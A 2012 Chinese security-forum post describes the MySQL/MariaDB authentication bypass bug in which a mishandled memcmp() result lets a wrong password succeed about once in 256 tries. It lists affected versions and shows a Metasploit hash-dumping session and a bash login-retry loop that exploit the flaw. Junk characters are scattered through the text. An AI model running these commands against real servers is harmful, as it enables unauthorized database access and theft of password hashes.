找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2181|回复: 0
打印 上一主题 下一主题

mysql任意用户密码概率登陆漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 20:11:53 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
1 u2 {4 ~' W& @( j' z! ?+ x" X1 W; H, ]1 d0 u
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。
3 a$ k' K! a, Z0 Z3 @, K, g: N: F! e" l
受影响的产品:; }- V5 P/ D( p( L7 K  O4 ?
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are) k9 f1 H% w. y9 S" S5 q% ]
vulnerable.% q6 w- W' i/ R7 ?" f" D8 ~8 z7 V* H6 D
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.6 j" B0 [' {, q1 @( W. {
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.% C+ d! O$ q( ^* c

7 {: i. L4 @0 w7 _  ]9 Q; F验证方法:
8 Z8 M: Y: Q( P* B  u0 v1 V' d5 y
; `; g# J; }4 l" I; f3 r0 f. z$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
0 h; m2 g6 Y: a7 D- ?! K% D
  t6 ~1 k2 U2 o1 E $ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>
- h6 T0 |0 D: y2 [# Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表